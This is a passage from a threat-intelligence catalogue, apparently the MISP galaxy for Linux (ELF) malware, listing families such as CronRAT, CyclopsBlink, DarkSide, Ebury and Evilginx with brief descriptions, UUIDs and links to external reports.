- https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://www.youtube.com/watch?v=cYx7sQRbjGA - webarchive
- https://www.justice.gov/opa/pr/multiple-foreign-nationals-charged-connection-trickbot-malware-and-conti-ransomware - webarchive
- https://resources.prodaft.com/wazawaka-report - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Cpuminer (ELF)
This was observed to be pushed by IoT malware, abusing devices for Litecoin and Bitcoin mining.
Internal MISP references
UUID 8196b6f6-386e-4499-b269-4e5c65f74141 which can be used as unique global reference for Cpuminer (ELF) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Cr1ptT0r
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cr1ptT0r.
| Known Synonyms |
|---|
| CriptTor |
Internal MISP references
UUID 196b20ec-c3d1-4136-ab94-a2a6cc150e74 which can be used as unique global reference for Cr1ptT0r in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.cr1ptt0r - webarchive
- https://resolverblog.blogspot.com/2019/03/de-cr1pt0r-tool-cr1pt0r-ransomware.html - webarchive
- https://www.bleepingcomputer.com/news/security/cr1ptt0r-ransomware-infects-d-link-nas-devices-targets-embedded-systems/ - webarchive
- https://resolverblog.blogspot.com/2019/02/d-link-dns-320-nas-cr1ptt0r-ransomware.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
CronRAT
A malware written in Bash that hides in the Linux calendar system on February 31st. Observed in relation to Magecart attacks.
Internal MISP references
UUID c49062cc-ceef-4794-9d8a-93ede434ecfd which can be used as unique global reference for CronRAT in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
CyclopsBlink
According to CISA, Cyclops Blink appears to be a replacement framework for the VPNFilter malware exposed in 2018, and which exploited network devices, primarily small office/home office (SOHO) routers and network attached storage (NAS) devices. Cyclops Blink has been deployed since at least June 2019, fourteen months after VPNFilter was disrupted. In common with VPNFilter, Cyclops Blink deployment also appears indiscriminate and widespread. The actor has so far primarily deployed Cyclops Blink to WatchGuard and ASUS devices, but it is likely that Sandworm would be capable of compiling the malware for other architectures and firmware.
Internal MISP references
UUID 76d4b754-e025-41c5-a767-7b00a39bd255 which can be used as unique global reference for CyclopsBlink in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.cyclops_blink - webarchive
- https://www.bleepingcomputer.com/news/security/asus-warns-of-cyclops-blink-malware-attacks-targeting-routers/ - webarchive
- https://www.justice.gov/opa/pr/justice-department-announces-court-authorized-disruption-botnet-controlled-russian-federation - webarchive
- https://www.justice.gov/opa/video/attorney-general-merrick-b-garland-announces-enforcement-actions-disrupt-and-prosecute - webarchive
- https://www.justice.gov/opa/press-release/file/1491281/download - webarchive
- https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview - webarchive
- https://www.bleepingcomputer.com/news/security/cisa-warns-orgs-of-watchguard-bug-exploited-by-russian-state-hackers/ - webarchive
- https://www.bleepingcomputer.com/news/security/us-disrupts-russian-cyclops-blink-botnet-before-being-used-in-attacks/ - webarchive
- https://www.theregister.com/2022/03/18/cyclops_asus_routers/ - webarchive
- https://www.shadowserver.org/news/shadowserver-special-reports-cyclops-blink/ - webarchive
- https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-054a - webarchive
- https://www.splunk.com/en_us/blog/security/strt-ta03-cpe-destructive-software.html - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyclops-blink-sets-sights-on-asus-routers/Appendix_Cyclops%20Blink%20Sets%20Sights%20on%20ASUS%20Routers.pdf - webarchive
- https://attack.mitre.org/groups/G0034 - webarchive
- https://github.com/trendmicro/research/blob/main/cyclops_blink/c2-scripts/check.py - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Dacls (ELF)
According to PCrisk, Dacls is the name of a remote access Trojan (RAT), a malicious program that allows cyber criminals to control infected computers remotely.
Research shows that this malware is tied to Lazarus Group (a group of cyber criminals) and targets Linux and the Windows operating system. Typically, cyber criminals use RATs to steal sensitive, confidential information, infect systems with other malware, and so on. In any case, no RAT is harmless, and any RAT found should be uninstalled immediately.
Internal MISP references
UUID 2e5e2a7e-4ee5-4954-9c92-e9b21649ae1b which can be used as unique global reference for Dacls (ELF) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.dacls - webarchive
- https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought - webarchive
- https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/ - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
- https://www.sygnia.co/mata-framework - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/ - webarchive
- https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/ - webarchive
- https://vblocalhost.com/uploads/VB2021-Park.pdf - webarchive
- https://securelist.com/apt-trends-report-q2-2020/97937/ - webarchive
- https://blog.netlab.360.com/dacls-the-dual-platform-rat/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Dark
Mirai variant exploiting CVE-2021-20090 and CVE-2021-35395 for spreading.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dark.
| Known Synonyms |
|---|
| Dark.IoT |
Internal MISP references
UUID d499e7ad-332f-4057-b31d-a69916408057 which can be used as unique global reference for Dark in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.dark - webarchive
- https://www.radware.com/getmedia/d312a5fa-2d8d-4c1e-b31e-73046f24bf35/Alert-Dark-OMIGOD.aspx - webarchive
- https://twitter.com/ESETresearch/status/1440052837820428298?s=20 - webarchive
- https://www.radware.com/getmedia/18d24c2d-c092-4a61-9ad6-ebb92b7a49b8/Alert_Realtek_SDK.aspx - webarchive
- https://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities - webarchive
- https://www.lacework.com/blog/kinsing-dark-iot-botnet-among-threats-targeting-cve-2022-26134/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
DarkCracks
A sophisticated payload delivery and upgrade framework, discovered in 2024. DarkCracks exploits compromised GLPI and WordPress sites to function as downloaders and C2 servers.
Internal MISP references
UUID 043c46fc-b98a-438e-b071-3ac76380f082 which can be used as unique global reference for DarkCracks in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Dark Nexus
Internal MISP references
UUID dfba0c8f-9d06-448b-817e-6fffa1b22cb9 which can be used as unique global reference for Dark Nexus in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.darknexus - webarchive
- https://www.stratosphereips.org/blog/2020/6/8/dark-nexus-the-old-the-new-and-the-ugly - webarchive
- https://www.trendmicro.com/en_us/research/21/l/the-evolution-of-iot-linux-malware-based-on-mitre-att&ck-ttps.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
DarkSide (ELF)
Internal MISP references
UUID 61796628-c37b-4284-9aa4-9f054cc6c3c2 which can be used as unique global reference for DarkSide (ELF) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.darkside - webarchive
- https://abcnews.go.com/Politics/biden-speak-colonial-pipeline-attack-americans-face-gasoline/story?id=77666212 - webarchive
- https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/ - webarchive
- https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group - webarchive
- https://therecord.media/popular-hacking-forum-bans-ransomware-ads/ - webarchive
- https://www.elliptic.co/blog/darkside-ransomware-has-netted-over-90-million-in-bitcoin - webarchive
- https://blog.group-ib.com/blackmatter2 - webarchive
- https://cloud.google.com/blog/topics/threat-intelligence/darkside-affiliate-supply-chain-software-compromise - webarchive
- https://www.wsj.com/articles/colonial-pipeline-ceo-tells-why-he-paid-hackers-a-4-4-million-ransom-11621435636 - webarchive
- https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf - webarchive
- https://www.secureworks.com/blog/ransomware-groups-use-tor-based-backdoor-for-persistent-access - webarchive
- https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html - webarchive
- https://www.justice.gov/opa/pr/department-justice-seizes-23-million-cryptocurrency-paid-ransomware-extortionists-darkside - webarchive
- https://www.bleepingcomputer.com/news/security/darkside-ransomware-servers-reportedly-seized-revil-restricts-targets/ - webarchive
- https://securityscorecard.com/blog/new-evidence-supports-assessment-that-darkside-likely-responsible-for-colonial-pipeline-ransomware-attack-others-targeted - webarchive
- https://www.crowdstrike.com/blog/how-ransomware-adversaries-reacted-to-the-darkside-pipeline-attack/ - webarchive
- https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html - webarchive
- https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html - webarchive
- https://www.maltego.com/blog/chasing-darkside-affiliates-identifying-threat-actors-connected-to-darkside-ransomware-using-maltego-intel-471-1/ - webarchive
- https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/ - webarchive
- https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/ - webarchive
- https://krebsonsecurity.com/2021/05/darkside-ransomware-gang-quits-after-servers-bitcoin-stash-seized/ - webarchive
- https://twitter.com/JAMESWT_MHT/status/1388301138437578757 - webarchive
- https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-money-a-day-after-biden-threat/ - webarchive
- https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf - webarchive
- https://cybersecurity.att.com/blogs/labs-research/darkside-raas-in-linux-version - webarchive
- https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/ - webarchive
- https://www.bleepingcomputer.com/news/security/chemical-distributor-pays-44-million-to-darkside-ransomware/ - webarchive
- https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/ - webarchive
- https://www.youtube.com/watch?v=qxPXxWMI2i4 - webarchive
- https://twitter.com/GelosSnake/status/1451465959894667275 - webarchive
- https://www.technologyreview.com/2021/05/24/1025195/colonial-pipeline-ransomware-bitdefender/ - webarchive
- https://blog.gigamon.com/2021/05/17/tracking-darkside-and-ransomware-the-network-view/ - webarchive
- https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/ - webarchive
- https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/ - webarchive
- https://otx.alienvault.com/pulse/60d0afbc395c24edefb33bb9 - webarchive
- https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b - webarchive
- https://pylos.co/2021/05/13/mind-the-air-gap/ - webarchive
- https://www.mandiant.com/resources/shining-a-light-on-darkside-ransomware-operations - webarchive
- https://www.youtube.com/watch?v=NIiEcOryLpI - webarchive
- https://www.intel471.com/blog/darkside-ransomware-shut-down-revil-avaddon-cybercrime - webarchive
- https://www.databreaches.net/a-former-darkside-listing-shows-up-on-revils-leak-site/ - webarchive
- https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/ - webarchive
- https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/ - webarchive
- https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/ - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/darkside-ransomware-victims-sold-short/ - webarchive
- https://blog.group-ib.com/blackmatter# - webarchive
- https://www.nytimes.com/2021/05/29/world/europe/ransomware-russia-darkside.html - webarchive
- https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/ - webarchive
- https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout - webarchive
- https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/ - webarchive
- https://www.ic3.gov/Media/News/2021/211101.pdf - webarchive
- https://www.elliptic.co/blog/elliptic-follows-bitcoin-ransoms-paid-by-darkside-ransomware-victims - webarchive
- https://www.crowdstrike.com/blog/falcon-protects-from-darkside-ransomware/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
DarkRadiation
Internal MISP references
UUID 39be337b-8a9a-4d71-949b-5efd6248fc80 which can be used as unique global reference for DarkRadiation in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
DDG
First activity observed in October 2017. DDG is a botnet with P2P capability that is targeting cryptocurrency mining (Monero).
Internal MISP references
UUID 5c42585b-ea92-4fe2-8a79-bb47a3df67ad which can be used as unique global reference for DDG in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.ddg - webarchive
- https://blog.netlab.360.com/threat-alert-ddg-3013-is-out/ - webarchive
- https://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-servers/ - webarchive
- https://blog.netlab.360.com/ddg-mining-botnet-jin-qi-huo-dong-fen-xi/ - webarchive
- https://blog.netlab.360.com/old-botnets-never-die-and-ddg-refuse-to-fade-away/ - webarchive
- https://blog.netlab.360.com/ddg-botnet-round-x-is-there-an-ending/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
ddoor
Internal MISP references
UUID 07f48866-647c-46b0-a0d4-29c81ad488a8 which can be used as unique global reference for ddoor in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
DEADBOLT
DEADBOLT is a Linux ransomware written in Go, targeting QNAP NAS devices worldwide. The files are encrypted with AES-128 and will have the .deadbolt extension appended to file names.
Internal MISP references
UUID b37c9ba2-f1b0-4a2f-9387-7310939d2189 which can be used as unique global reference for DEADBOLT in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.deadbolt - webarchive
- https://securelist.com/new-ransomware-trends-in-2022/106457/ - webarchive
- https://community.riskiq.com/article/1601124b - webarchive
- https://www.bleepingcomputer.com/news/security/new-deadbolt-ransomware-targets-qnap-devices-asks-50-btc-for-master-key/ - webarchive
- https://www.trendmicro.com/en_us/research/22/f/closing-the-door-deadbolt-ransomware-locks-out-vendors-with-mult.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Decoy Dog RAT
Internal MISP references
UUID 6452720d-bd35-4c55-8178-ed0dd86f4c53 which can be used as unique global reference for Decoy Dog RAT in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Denonia
Cado discovered this malware, written in Go and targeting AWS Lambda environments.
Internal MISP references
UUID d5d9bb86-715d-4d86-a4d2-ab73085d1b0c which can be used as unique global reference for Denonia in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Derusbi (ELF)
Internal MISP references
UUID 494dcdfb-88cb-456d-a95a-252ff10c0ba9 which can be used as unique global reference for Derusbi (ELF) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
DISGOMOJI
Internal MISP references
UUID 1f6098a1-2395-4329-8865-49602638f45a which can be used as unique global reference for DISGOMOJI in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Dofloo
Dofloo (aka AESDDoS) is a popular malware used to create large scale botnets that can launch DDoS attacks and load cryptocurrency miners to the infected machines.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dofloo.
| Known Synonyms |
|---|
| AESDDoS |
Internal MISP references
UUID ffb5789f-d7e6-4723-a447-e5bb2fe713a0 which can be used as unique global reference for Dofloo in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Doki
Internal MISP references
UUID a5446b35-8613-4121-ada4-c0b1d6f72851 which can be used as unique global reference for Doki in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.doki - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
- https://www.intezer.com/container-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/ - webarchive
- https://www.securecoding.com/blog/all-about-doki-malware/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
DoubleFantasy (ELF)
Internal MISP references
UUID a41d8c89-8229-4936-96c2-4b194ebaf858 which can be used as unique global reference for DoubleFantasy (ELF) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
DreamBus
Internal MISP references
UUID 22ff8eac-d92e-4c6e-829b-9b565d90eddd which can be used as unique global reference for DreamBus in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Ebury
This payload was used to compromise kernel.org back in August 2011 and has hit cPanel Support, which in turn infected quite a few cPanel servers. It is a credential-stealing payload which steals SSH keys, passwords, and potentially other credentials.
This family is part of a wider range of tools which are described in detail in the Operation Windigo whitepaper by ESET.
Internal MISP references
UUID ce79265c-a467-4a17-b27d-7ec7954688d5 which can be used as unique global reference for Ebury in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.ebury - webarchive
- https://www.welivesecurity.com/2018/12/05/dark-side-of-the-forsshe/ - webarchive
- https://security.web.cern.ch/security/advisories/windigo/windigo.shtml - webarchive
- https://www.welivesecurity.com/2014/10/15/operation-windigo-good-job-eset-says-malware-author/ - webarchive
- https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/ - webarchive
- https://web-assets.esetstatic.com/wls/en/papers/white-papers/ebury-is-alive-but-unseen.pdf - webarchive
- https://csirt.gov.it/data/cms/posts/582/attachments/66ca2e9a-68cd-4df5-81a2-674c31a699c2/download - webarchive
- https://www.acn.gov.it/portale/documents/20119/586040/CSIRT_Italiano_Windigo_Ebury_Variant.pdf - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf - webarchive
- https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/ - webarchive
- https://www.welivesecurity.com/en/eset-research/ebury-alive-unseen-400k-linux-servers-compromised-cryptotheft-financial-gain/ - webarchive
- https://www.justice.gov/opa/pr/russian-citizen-pleads-guilty-involvement-global-botnet-conspiracy - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Echobot
The latest in this long line of Mirai scourges is a new variant named Echobot. Coming to life in mid-May, the malware was first described by Palo Alto Networks in a report published at the start of June, and then again in a report by security researchers from Akamai, in mid-June.
When it was first spotted by Palo Alto Networks researchers in early June, Echobot was using exploits for 18 vulnerabilities. In the Akamai report, a week later, Echobot was at 26.
https://www.zdnet.com/article/new-echobot-malware-is-a-smorgasbord-of-vulnerabilities
Internal MISP references
UUID 040ac9c6-e3ab-4b51-88a9-5380101c74f8 which can be used as unique global reference for Echobot in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.echobot - webarchive
- https://unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/ - webarchive
- https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/ - webarchive
- https://www.bleepingcomputer.com/news/security/new-echobot-botnet-variant-uses-over-50-exploits-to-propagate/ - webarchive
- https://blogs.akamai.com/sitr/2019/06/latest-echobot-26-infection-vectors.html - webarchive
- https://www.f5.com/labs/articles/threat-intelligence/echobot-malware-now-up-to-71-exploits--targeting-scada - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
EdgeStepper
According to ESET Research, EdgeStepper is an adversary-in-the-middle tool, which forwards DNS traffic from machines in a targeted network to a malicious DNS node. This allows the attackers to redirect the traffic from software updates to a hijacking node that serves instructions to the legitimate software to download a malicious update.
Internal MISP references
UUID 48969976-4b49-48f9-98d1-6b85beae2a3b which can be used as unique global reference for EdgeStepper in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Elevator
Internal MISP references
UUID 6ee05063-4f73-4a99-86a5-906164039a3a which can be used as unique global reference for Elevator in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
EnemyBot
According to the Infosec Institute, EnemyBot is a dangerous IoT botnet that has made headlines in the last few weeks. This threat, which seems to be disseminated by the Keksec group, expanded its features by adding recent vulnerabilities discovered in 2022. It was designed to attack web servers, Android devices and content management systems (CMS) servers.
Internal MISP references
UUID 262d18be-7cab-46c2-bcb0-47fff17604aa which can be used as unique global reference for EnemyBot in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.enemybot - webarchive
- https://www.fortinet.com/blog/threat-research/enemybot-a-look-into-keksecs-latest-ddos-botnet - webarchive
- https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory - webarchive
- https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers - webarchive
- https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/ - webarchive
- https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Erebus (ELF)
Internal MISP references
UUID 479353aa-c6d7-47a7-b5f0-3f97fd904864 which can be used as unique global reference for Erebus (ELF) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.erebus - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/erebus-resurfaces-as-linux-ransomware/ - webarchive
- https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
ESXiArgs
Ransomware used to target ESXi servers.
Internal MISP references
UUID 7550af7f-91cc-49e7-a4c5-d4e4d993cbef which can be used as unique global reference for ESXiArgs in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.esxi_args - webarchive
- https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/ - webarchive
- https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/ - webarchive
- https://blog.ovhcloud.com/ransomware-targeting-vmware-esxi/ - webarchive
- https://www.youtube.com/watch?v=bBcvqxPdjoI - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Evilginx
According to the author, Evilginx is a standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication.
Internal MISP references
UUID 8eee410f-0538-4a6c-897b-c6bf4f9f28d7 which can be used as unique global reference for Evilginx in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.evilginx - webarchive
- https://github.com/kgretzky/evilginx2 - webarchive
- https://www.ironnet.com/blog/robin-banks-still-might-be-robbing-your-bank-part-2 - webarchive
- https://osamaellahi.medium.com/the-art-of-defense-evasion-part-3-bypass-multi-factor-authentication-mfa-26d3a87dea0f - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
EvilGnome
According to Infosec Institute, EvilGnome presents itself to unwitting Linux users as a legitimate GNOME extension. Legitimate extensions help to extend Linux functionality, but instead of a healthy boost in system functionality, EvilGnome begins spying on users with an array of functionalities uncommon for most Linux malware types.
Internal MISP references
UUID 149e693c-4b51-4143-9061-6a8698b0e7f5 which can be used as unique global reference for EvilGnome in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.evilgnome - webarchive
- https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought - webarchive
- https://ssu.gov.ua/uploads/files/DKIB/Technical%20report%20Armagedon.pdf - webarchive
- https://www.intezer.com/blog-evilgnome-rare-malware-spying-on-linux-desktop-users/ - webarchive
- https://cocomelonc.github.io/linux/2024/11/22/linux-hacking-3.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
EwDoor
Internal MISP references
UUID e75eb723-7c23-4a3b-9419-cefb88e5f6b7 which can be used as unique global reference for EwDoor in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Exaramel (ELF)
Internal MISP references
UUID 1e0540f3-bad3-403f-b8ed-ce40a276559e which can be used as unique global reference for Exaramel (ELF) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.exaramel - webarchive
- https://www.wired.com/story/sandworm-centreon-russia-hack/ - webarchive
- https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf - webarchive
- https://www.domaintools.com/resources/blog/centreon-to-exim-and-back-on-the-trail-of-sandworm - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf - webarchive
- https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf - webarchive
- https://twitter.com/craiu/status/1361581668092493824 - webarchive
- https://attack.mitre.org/groups/G0034 - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
ext4
Internal MISP references
UUID 79b2b3c0-6119-4511-9c33-2a48532b6a60 which can be used as unique global reference for ext4 in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Facefish
Internal MISP references
UUID 106487ea-a710-4546-bd62-bdbfa0b0447e which can be used as unique global reference for Facefish in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
FBot
Internal MISP references
UUID 501e5434-5796-4d63-8539-d99ec48119c2 which can be used as unique global reference for FBot in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.fbot - webarchive
- https://blog.netlab.360.com/fbot-is-now-riding-the-traffic-and-transportation-smart-devices-en/ - webarchive
- https://blog.malwaremustdie.org/2020/01/mmd-0065-2020-linuxmirai-fbot.html - webarchive
- https://securitynews.sonicwall.com/xmlpost/vigilante-malware-removes-cryptominers-from-the-infected-device/ - webarchive
- https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
FINALDRAFT (ELF)
Internal MISP references
UUID b82fc089-4c16-4bd6-a6d8-602b1d29e96c which can be used as unique global reference for FINALDRAFT (ELF) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
FinFisher (ELF)
Internal MISP references
UUID 44018d71-25fb-4959-b61e-d7af97c85131 which can be used as unique global reference for FinFisher (ELF) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.finfisher - webarchive
- https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/ - webarchive
- https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/ - webarchive
- https://securelist.com/finspy-unseen-findings/104322/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
FireWood
Internal MISP references
UUID a65d5d88-c414-4670-afff-b2ff555ede8b which can be used as unique global reference for FireWood in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Flodrix
Internal MISP references
UUID c7410cab-4912-4a7b-aa7f-db5f4dbbb5e1 which can be used as unique global reference for Flodrix in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
floodor
Internal MISP references
UUID ac30f2be-8153-4588-b29c-5e5863792930 which can be used as unique global reference for floodor in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Fodcha
Malware used to run a DDoS botnet.
Internal MISP references
